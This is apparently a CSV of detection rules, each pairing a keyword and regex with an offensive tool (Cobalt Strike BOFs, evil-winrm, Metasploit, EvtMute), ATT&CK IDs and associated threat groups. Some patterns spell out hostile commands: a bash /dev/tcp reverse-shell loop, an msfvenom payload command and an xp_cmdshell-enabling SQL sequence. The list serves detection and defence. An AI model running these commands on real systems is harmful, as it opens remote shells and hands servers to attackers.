"*eviluser@tutanota.com*",".{0,1000}eviluser\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43394"
"*evil-winrm -*",".{0,1000}evil\-winrm\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43395"
"*evil-winrm*",".{0,1000}evil\-winrm.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","1","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","43396"
"*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43397"
"*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43398"
"*EvtMuteHook.iobj*",".{0,1000}EvtMuteHook\.iobj.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43399"
"*EvtMuteHook.ipdb*",".{0,1000}EvtMuteHook\.ipdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43400"
"*EvtMuteHook.pdb*",".{0,1000}EvtMuteHook\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43401"
"*EvtMuteHook.sln*",".{0,1000}EvtMuteHook\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43402"
"*EvtMute-master*",".{0,1000}EvtMute\-master.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","43403"
"*EVUAC *.exe*",".{0,1000}EVUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","0","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","43404"
"*ewby/Mockingjay_BOF*",".{0,1000}ewby\/Mockingjay_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","43405"
"*ewok -t *",".{0,1000}ewok\s\-t\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","N/A","1","76","20","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z","43406"
"*Ex_MiniDumpWriteDumpCallback*",".{0,1000}Ex_MiniDumpWriteDumpCallback.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","43407"
"*example-bof.sln*",".{0,1000}example\-bof\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","43408"
"*examples/netview.py*",".{0,1000}examples\/netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43409"
"*Excel-Exploit.git*",".{0,1000}Excel\-Exploit\.git.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","43410"
"*Excel-Exploit-main*",".{0,1000}Excel\-Exploit\-main.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","43411"
"*ExcelReflectImplant*",".{0,1000}ExcelReflectImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43412"
"*excelshellinject.*",".{0,1000}excelshellinject\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","43413"
"*exchange_proxylogon_rce.*",".{0,1000}exchange_proxylogon_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43414"
"*exchange_proxynotshell_rce.*",".{0,1000}exchange_proxynotshell_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43415"
"*Exe To Base 64 By hackers DZ.exe*",".{0,1000}Exe\sTo\sBase\s64\sBy\shackers\sDZ\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43416"
"*exe_dll_shellcode genetic.config*",".{0,1000}exe_dll_shellcode\sgenetic\.config.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","43422"
"*exe_stager.exe*",".{0,1000}exe_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43423"
"*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43424"
"*exe_to_dll.exe*",".{0,1000}exe_to_dll\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43425"
"*exe_to_dll_*.zip*",".{0,1000}exe_to_dll_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43426"
"*exe_to_dll_*_32bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_32bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43427"
"*exe_to_dll_*_64bit.zip*",".{0,1000}exe_to_dll_.{0,1000}_64bit\.zip.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43428"
"*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43429"
"*exe_to_dll-master*",".{0,1000}exe_to_dll\-master.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","43430"
"*exe2bat.cpp*",".{0,1000}exe2bat\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43431"
"*exe2bat.exe*",".{0,1000}exe2bat\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43432"
"*exe2powershell.cpp*",".{0,1000}exe2powershell\.cpp.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43433"
"*exe2powershell.exe*",".{0,1000}exe2powershell\.exe.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43434"
"*exe2powershell-master*",".{0,1000}exe2powershell\-master.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","43435"
"*exec 5<>/dev/tcp/*/*;cat <&5 | while read line; do $line 2>&5 >&5; done*",".{0,1000}exec\s5\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;cat\s\<\&5\s\|\swhile\sread\sline\;\sdo\s\$line\s2\>\&5\s\>\&5\;\sdone.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","43439"
"*exec CMD=/bin/sh -f elf -o *.elf*",".{0,1000}exec\sCMD\=\/bin\/sh\s\-f\self\s\-o\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43440"
"*EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell*",".{0,1000}EXEC\ssp_configure\s\'show\sadvanced\soptions\',\s1\;\sRECONFIGURE\;\sEXEC\ssp_configure\s\'xp_cmdshell\',\s1\;\sRECONFIGURE\;\sEXEC\sxp_cmdshell.{0,1000}","offensive_tool_keyword","POC","CVE-2024-29824 POC exploitation","T1190 - T1105 - T1210","TA0001 - TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/horizon3ai/CVE-2024-29824","1","0","N/A","N/A","10","1","22","6","2024-06-12T14:04:39Z","2024-06-12T13:53:32Z","43442"
"*exec tun2socks*",".{0,1000}exec\stun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43443"
"*Exec_Command_Silent.vbs*",".{0,1000}Exec_Command_Silent\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43444"
"*Exec_Command_WithOutput.vbs*",".{0,1000}Exec_Command_WithOutput\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43445"
"*exec_payload_msi*",".{0,1000}exec_payload_msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43446"
"*exec_shellcode.rb*",".{0,1000}exec_shellcode\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43447"
